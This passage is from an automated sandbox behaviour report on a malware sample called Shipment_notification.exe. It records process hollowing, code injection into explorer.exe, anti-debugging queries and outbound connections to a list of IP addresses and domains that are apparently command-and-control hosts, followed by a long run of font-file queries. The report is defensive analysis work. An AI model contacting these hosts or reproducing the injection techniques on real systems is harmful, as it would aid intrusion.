          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040CEE3 LdrLoadDll,2_2_0040CEE3
          Source: C:\Users\user\Desktop\Shipment_notification.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 206.54.190.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.218.155.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tcatelier.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.114.105.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.carcosainvest.com
          Source: C:\Windows\explorer.exeDomain query: www.locationsbormes.com
          Source: C:\Windows\explorer.exeDomain query: www.peramid.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.piergitarshoes.com
          Source: C:\Windows\explorer.exeDomain query: www.emagrecarapido.store
          Source: C:\Windows\explorer.exeDomain query: www.isabellagambitta.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.27.134.217 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.161.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ywtxsm.com
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.drkathleensanders.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 880000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Shipment_notification.exeMemory written: C:\Users\user\Desktop\Shipment_notification.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exeJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exeJump to behavior
          Source: explorer.exe, 00000003.00000000.353184774.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536066000.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.562430568.00000000086B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.577680371.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.339413260.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Users\user\Desktop\Shipment_notification.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
